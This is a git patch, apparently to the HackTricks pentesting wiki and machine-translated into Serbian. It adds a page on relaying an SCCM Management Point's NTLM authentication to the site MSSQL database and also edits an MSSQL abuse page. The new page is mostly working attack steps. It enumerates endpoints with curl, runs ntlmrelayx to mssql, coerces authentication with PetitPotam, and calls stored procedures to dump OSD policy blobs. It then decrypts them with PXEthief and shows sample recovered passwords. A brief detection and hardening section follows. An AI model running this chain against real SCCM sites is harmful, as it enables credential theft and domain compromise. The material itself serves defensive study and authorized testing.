From cfb2a31c446ca25d6c8acb6d5e85242426c28f2c Mon Sep 17 00:00:00 2001
From: Translator <github-actions@github.com>
Date: Tue, 22 Jul 2025 08:30:50 +0000
Subject: [PATCH] Translated
 ['src/windows-hardening/active-directory-methodology/abusing-

---
 src/SUMMARY.md                                |   1 +
 .../abusing-ad-mssql.md                       |  16 +-
 ...nagement-point-relay-sql-policy-secrets.md | 155 ++++++++++++++++++
 3 files changed, 167 insertions(+), 5 deletions(-)
 create mode 100644 src/windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md

diff --git a/src/SUMMARY.md b/src/SUMMARY.md
index b09540790..09ba11160 100644
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -283,6 +283,7 @@
   - [Privileged Groups](windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md)
   - [RDP Sessions Abuse](windows-hardening/active-directory-methodology/rdp-sessions-abuse.md)
   - [Resource-based Constrained Delegation](windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md)
+  - [Sccm Management Point Relay Sql Policy Secrets](windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md)
   - [Security Descriptors](windows-hardening/active-directory-methodology/security-descriptors.md)
   - [SID-History Injection](windows-hardening/active-directory-methodology/sid-history-injection.md)
   - [Silver Ticket](windows-hardening/active-directory-methodology/silver-ticket.md)
diff --git a/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md b/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
index 4914fca58..787b632c9 100644
--- a/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
+++ b/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
@@ -7,7 +7,7 @@
 
 ### Python
 
-Alat [MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) se zasniva na impacket-u, i takođe omogućava autentifikaciju koristeći kerberos karte, i napad kroz lanac veza.
+Alat [MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) se zasniva na impacket-u, i takođe omogućava autentifikaciju koristeći kerberos karte, i napad kroz lanac linkova.
 
 <figure><img src="https://raw.githubusercontent.com/ScorpionesLabs/MSSqlPwner/main/assets/interractive.png"></figure>
 ```shell
@@ -90,7 +90,7 @@ mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive
 ---
 ###  Powershell
 
-Modul powershell [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) je veoma koristan u ovom slučaju.
+Powershell modul [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) je veoma koristan u ovom slučaju.
 ```bash
 Import-Module .\PowerupSQL.psd1
 ````
@@ -180,7 +180,7 @@ Ako je MSSQL instanca pouzdana (povezana baza) od strane druge MSSQL instance. A
 
 **Povezane baze funkcionišu čak i preko šuma poverenja.**
 
-### Zloupotreba Powershell-a
+### Powershell Zloupotreba
 ```bash
 #Look for MSSQL links of an accessible instance
 Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0
@@ -226,11 +226,11 @@ Možete lako proveriti pouzdane linkove koristeći metasploit.
 msf> use exploit/windows/mssql/mssql_linkcrawler
 [msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
 ```
-Obratite pažnju da će metasploit pokušati da iskoristi samo `openquery()` funkciju u MSSQL (dakle, ako ne možete da izvršite komandu sa `openquery()`, moraćete da pokušate `EXECUTE` metodu **ručno** da izvršite komande, više informacija u nastavku.)
+Obratite pažnju da će metasploit pokušati da zloupotrebi samo `openquery()` funkciju u MSSQL (dakle, ako ne možete da izvršite komandu sa `openquery()`, moraćete da pokušate `EXECUTE` metodu **ručno** da izvršite komande, više informacija u nastavku.)
 
 ### Ručno - Openquery()
 
-Sa **Linux**-a možete dobiti MSSQL konzolnu ljusku sa **sqsh** i **mssqlclient.py.**
+Sa **Linux**-a možete dobiti MSSQL konzolu sa **sqsh** i **mssqlclient.py.**
 
 Sa **Windows**-a takođe možete pronaći linkove i izvršiti komande ručno koristeći **MSSQL klijent kao** [**HeidiSQL**](https://www.heidisql.com)
 
@@ -282,4 +282,10 @@ Strategija koju su mnogi autori smislili je da primoraju SYSTEM servis da se aut
 
 [SweetPotato](https://github.com/CCob/SweetPotato) ima kolekciju ovih raznih tehnika koje se mogu izvršiti putem Beacon-ove `execute-assembly` komande.
 
+### SCCM Tačka Upravljanja NTLM Preusmeravanje (Ekstrakcija OSD Tajni)
+Pogledajte kako se podrazumevane SQL uloge SCCM **Tačaka Upravljanja** mogu zloupotrebiti za dumpovanje tajni Mrežnog Pristupnog Naloga i Task-Sequence direktno iz baze podataka sajta:
+{{#ref}}
+sccm-management-point-relay-sql-policy-secrets.md
+{{#endref}}
+
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md b/src/windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md
new file mode 100644
index 000000000..6f19a9d7c
--- /dev/null
+++ b/src/windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md
@@ -0,0 +1,155 @@
+# SCCM Management Point NTLM Relay to SQL – OSD Policy Secret Extraction
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## TL;DR
+Prisiljavanjem **System Center Configuration Manager (SCCM) Management Point (MP)** da se autentifikuje preko SMB/RPC i **preusmeravanjem** tog NTLM korisničkog naloga na **bazu podataka sajta (MSSQL)** dobijate `smsdbrole_MP` / `smsdbrole_MPUserSvc` prava. Ove uloge vam omogućavaju da pozivate skup procedura koje izlažu **Operating System Deployment (OSD)** policy blobove (akreditivi za pristup mreži, varijable radnog toka, itd.). Blobovi su heksadecimalno kodirani/šifrovani, ali se mogu dekodirati i dešifrovati pomoću **PXEthief**, što daje tajne u običnom tekstu.
+
+Visok nivo lanca:
+1. Otkrijte MP & bazu podataka sajta ↦ neautentifikovani HTTP endpoint `/SMS_MP/.sms_aut?MPKEYINFORMATIONMEDIA`.
+2. Pokrenite `ntlmrelayx.py -t mssql://<SiteDB> -ts -socks`.
+3. Prisilite MP koristeći **PetitPotam**, PrinterBug, DFSCoerce, itd.
+4. Kroz SOCKS proxy povežite se sa `mssqlclient.py -windows-auth` kao preusmereni **<DOMAIN>\\<MP-host>$** nalog.
+5. Izvršite:
+* `use CM_<SiteCode>`
+* `exec MP_GetMachinePolicyAssignments N'<UnknownComputerGUID>',N''`
+* `exec MP_GetPolicyBody N'<PolicyID>',N'<Version>'`   (ili `MP_GetPolicyBodyAfterAuthorization`)
+6. Uklonite `0xFFFE` BOM, `xxd -r -p` → XML  → `python3 pxethief.py 7 <hex>`.
+
+Tajne kao što su `OSDJoinAccount/OSDJoinPassword`, `NetworkAccessUsername/Password`, itd. se obnavljaju bez dodirivanja PXE ili klijenata.
+
+---
+
+## 1. Enumerating unauthenticated MP endpoints
+MP ISAPI ekstenzija **GetAuth.dll** izlaže nekoliko parametara koji ne zahtevaju autentifikaciju (osim ako je sajt samo PKI):
+
+| Parameter | Purpose |
+|-----------|---------|
+| `MPKEYINFORMATIONMEDIA` | Vraća javni ključ sertifikata za potpisivanje sajta + GUID-ove *x86* / *x64* **All Unknown Computers** uređaja. |
+| `MPLIST` | Lista svaki Management-Point u sajtu. |
+| `SITESIGNCERT` | Vraća sertifikat za potpisivanje Primarnog Sajta (identifikuje server sajta bez LDAP). |
+
+Zgrabite GUID-ove koji će delovati kao **clientID** za kasnije DB upite:
+```bash
+curl http://MP01.contoso.local/SMS_MP/.sms_aut?MPKEYINFORMATIONMEDIA | xmllint --format -
+```
+---
+
+## 2. Prosledi MP račun mašine ka MSSQL
+```bash
+# 1. Start the relay listener (SMB→TDS)
+ntlmrelayx.py -ts -t mssql://10.10.10.15 -socks -smb2support
+
+# 2. Trigger authentication from the MP (PetitPotam example)
+python3 PetitPotam.py 10.10.10.20 10.10.10.99 \
+-u alice -p P@ssw0rd! -d CONTOSO -dc-ip 10.10.10.10
+```
+Kada se primorač aktivira, trebali biste videti nešto poput:
+```
+[*] Authenticating against mssql://10.10.10.15 as CONTOSO/MP01$ SUCCEED
+[*] SOCKS: Adding CONTOSO/MP01$@10.10.10.15(1433)
+```
+---
+
+## 3. Identifikujte OSD politike putem sačuvanih procedura
+Povežite se preko SOCKS proksija (port 1080 po defaultu):
+```bash
+proxychains mssqlclient.py CONTOSO/MP01$@10.10.10.15 -windows-auth
+```
+Pređite na **CM_<SiteCode>** DB (koristite 3-cifreni kod lokacije, npr. `CM_001`).
+
+### 3.1  Pronađite GUID-ove nepoznatih računara (opciono)
+```sql
+USE CM_001;
+SELECT SMS_Unique_Identifier0
+FROM dbo.UnknownSystem_DISC
+WHERE DiscArchKey = 2; -- 2 = x64, 0 = x86
+```
+### 3.2  Lista dodeljenih politika
+```sql
+EXEC MP_GetMachinePolicyAssignments N'e9cd8c06-cc50-4b05-a4b2-9c9b5a51bbe7', N'';
+```
+Svaki red sadrži `PolicyAssignmentID`, `Body` (hex), `PolicyID`, `PolicyVersion`.
+
+Fokusirajte se na politike:
+* **NAAConfig**  – kredencijali za nalog za pristup mreži
+* **TS_Sequence** – varijable sekvence zadatka (OSDJoinAccount/Password)
+* **CollectionSettings** – može sadržati naloge za izvršavanje
+
+### 3.3  Preuzmite puni sadržaj
+Ako već imate `PolicyID` i `PolicyVersion`, možete preskočiti zahtev za clientID koristeći:
+```sql
+EXEC MP_GetPolicyBody N'{083afd7a-b0be-4756-a4ce-c31825050325}', N'2.00';
+```
+> VAŽNO: U SSMS povećajte “Maksimalni broj preuzetih karaktera” (>65535) ili će blob biti skraćen.
+
+---
+
+## 4. Dekodirajte i dekriptujte blob
+```bash
+# Remove the UTF-16 BOM, convert from hex → XML
+echo 'fffe3c003f0078…' | xxd -r -p > policy.xml
+
+# Decrypt with PXEthief (7 = decrypt attribute value)
+python3 pxethief.py 7 $(xmlstarlet sel -t -v "//value/text()" policy.xml)
+```
+Primer oporavljenih tajni:
+```
+OSDJoinAccount : CONTOSO\\joiner
+OSDJoinPassword: SuperSecret2025!
+NetworkAccessUsername: CONTOSO\\SCCM_NAA
+NetworkAccessPassword: P4ssw0rd123
+```
+---
+
+## 5. Relevant SQL uloge i procedure
+Upon relay, prijava je mapirana na:
+* `smsdbrole_MP`
+* `smsdbrole_MPUserSvc`
+
+Ove uloge izlažu desetine EXEC dozvola, ključne koje se koriste u ovom napadu su:
+
+| Stored Procedure | Svrha |
+|------------------|---------|
+| `MP_GetMachinePolicyAssignments` | Lista politika primenjenih na `clientID`. |
+| `MP_GetPolicyBody` / `MP_GetPolicyBodyAfterAuthorization` | Vraća kompletno telo politike. |
+| `MP_GetListOfMPsInSiteOSD` | Vraćeno putem `MPKEYINFORMATIONMEDIA` puta. |
+
+Možete pregledati celu listu sa:
+```sql
+SELECT pr.name
+FROM   sys.database_principals AS dp
+JOIN   sys.database_permissions AS pe ON pe.grantee_principal_id = dp.principal_id
+JOIN   sys.objects AS pr ON pr.object_id = pe.major_id
+WHERE  dp.name IN ('smsdbrole_MP','smsdbrole_MPUserSvc')
+AND  pe.permission_name='EXECUTE';
+```
+---
+
+## 6. Detekcija i Ojačavanje
+1. **Pratite MP prijave** – bilo koji MP račun računara koji se prijavljuje sa IP adrese koja nije njegova domaćin ≈ relj.
+2. Omogućite **Proširenu zaštitu za autentifikaciju (EPA)** na bazi podataka sajta (`PREVENT-14`).
+3. Onemogućite neiskorišćeni NTLM, primenite SMB potpisivanje, ograničite RPC (
+iste mere zaštite korišćene protiv `PetitPotam`/`PrinterBug`).
+4. Ojačajte MP ↔ DB komunikaciju sa IPSec / mutual-TLS.
+
+---
+
+## Takođe pogledajte
+* Osnovi NTLM relja:
+{{#ref}}
+../ntlm/README.md
+{{#endref}}
+
+* MSSQL zloupotreba i post-ekspolatacija:
+{{#ref}}
+abusing-ad-mssql.md
+{{#endref}}
+
+
+
+## Reference
+- [Želeo bih da razgovaram sa vašim menadžerom: Krađa tajni pomoću relja tačaka upravljanja](https://specterops.io/blog/2025/07/15/id-like-to-speak-to-your-manager-stealing-secrets-with-management-point-relays/)
+- [PXEthief](https://github.com/MWR-CyberSec/PXEThief)
+- [Menadžer pogrešnih konfiguracija – ELEVATE-4 & ELEVATE-5](https://github.com/subat0mik/Misconfiguration-Manager)
+{{#include ../../banners/hacktricks-training.md}}